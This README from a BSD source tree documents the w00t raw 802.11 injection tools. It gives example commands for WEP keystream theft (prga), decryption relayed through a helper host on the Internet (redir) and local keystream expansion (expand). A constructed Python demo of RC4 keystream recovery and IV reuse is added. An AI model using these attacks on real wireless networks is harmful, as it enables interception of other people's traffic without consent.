xref: /dragonfly/tools/tools/net80211/w00t/README (revision 9348a738)
$FreeBSD: src/tools/tools/net80211/w00t/README,v 1.2 2009/07/24 15:31:22 sam Exp $

This is a collection of tools that use raw 802.11 packet injection.
None of the tools configure the interface, so be sure to run something
like:

ifconfig wlan create wlandev ath0 wlanmode ahdemo channel 7 promisc up

beforehand.  The following tools are found here:

assoc	A wifi client.
ap	A wifi access point.

prga	Gives ability to transmit on a WEP network.
redir	Gives ability to decrypt in real-time on a WEP network, via Internet.
expand	Gives ability to decrypt locally on a WEP network.

All these tools depend on:

libw00t	Utility functions used by all tools.

Detailed explanation of tools.
==============================

assoc:

Acts as a wifi client.  It will associate to a network and bind a
tap interface to it.  The interface may be used like a standard eth
interface attached to a normal LAN.  Multiple instances of the
program may be run in order to connect to multiple APs simultaneously.
Example:

./assoc -s w00t -t tap0
ifconfig tap0 192.168.0.123 up
ping 192.168.0.1

ap:

The same as assoc, but acts as an access point.  Example:

./ap -s w00t -t tap1
ifconfig tap1 192.168.0.1 up
tcpdump -n -i tap1

[For the next set of tools, refer to http://tapir.cs.ucl.ac.uk/bittau-wep.pdf
for theoretical information.]

prga:

Sniff a packet on a WEP network and obtain a keystream.  It binds
to a tap interface which may be used to TX packets on that network.
Example:

./prga -b bssid_of_network -t tap0
ifconfig tap0 192.168.0.123 up
ping 192.168.0.1
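The cryptographic weakness prga depends on, shown as an added Python example that is not part of w00t: a WEP frame's RC4 keystream is derived only from IV || key, so one frame with a known plaintext prefix (the LLC/SNAP header every IP frame body begins with) gives up that keystream, which then exposes any other frame sent under the same IV.  Key, IV and payloads below are constructed, and the CRC-32 ICV that WEP appends before encryption is omitted.

```python
"""Keystream recovery and reuse in WEP (constructed demo, ICV omitted)."""
from typing import Optional, Tuple


def rc4_keystream(key: bytes, n: int) -> bytes:
    """Return n bytes of RC4 keystream for key (KSA, then PRGA)."""
    s = list(range(256))
    j = 0
    for i in range(256):                       # key-scheduling algorithm
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for _ in range(n):                         # pseudo-random generation
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def wep_encrypt(key: bytes, iv: bytes, body: bytes) -> bytes:
    """WEP data body: 3-byte IV in the clear, then RC4(IV || key) XOR body."""
    return iv + xor(body, rc4_keystream(iv + key, len(body)))


# LLC/SNAP header carried by every IP frame body: predictable plaintext.
LLC_SNAP_IP = bytes.fromhex("aaaa030000000800")


def recover_keystream(frame: bytes, known: bytes) -> Tuple[bytes, bytes]:
    """XOR a known plaintext prefix out of one frame -> (iv, keystream)."""
    return frame[:3], xor(frame[3:3 + len(known)], known)


def decrypt_under_iv(frame: bytes, iv: bytes, ks: bytes) -> Optional[bytes]:
    """Any other frame reusing that IV is readable up to len(ks) bytes."""
    if frame[:3] != iv:
        return None
    return xor(frame[3:3 + len(ks)], ks)


def demo() -> Tuple[bool, Optional[bytes]]:
    key = bytes.fromhex("0123456789abcdef0123456789")   # constructed 104-bit key
    iv = bytes.fromhex("c0ffee")                          # constructed IV
    frame_a = wep_encrypt(key, iv, LLC_SNAP_IP + b"first payload")
    frame_b = wep_encrypt(key, iv, LLC_SNAP_IP + b"other payload")  # IV reused
    iv_seen, ks = recover_keystream(frame_a, LLC_SNAP_IP)
    same_as_true_keystream = ks == rc4_keystream(iv + key, len(ks))
    return same_as_true_keystream, decrypt_under_iv(frame_b, iv_seen, ks)
```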

redir:

Resend WEP packets to our buddy on the Internet.  The buddy will
receive the clear-text and send it back to us via a UDP socket.
This data is then fed back into a tap interface.  This way, data
may ultimately be read from the tap iface in clear-text.  Example:

[Box on Internet]~# ./buddy
./redir -d buddy_ip -b bssid -t tap0 -r wifi_rtr_mac -s wifi_src_ip -p 666
ifconfig tap0 up
tcpdump -n -i tap0

expand:

Sniff a WEP packet and do the linear keystream expansion trick to
decrypt it.  The clear-text packet is sent to a tap interface.
Example:

./expand -b bssid -t tap0
ifconfig tap0 up
tcpdump -n -i tap0
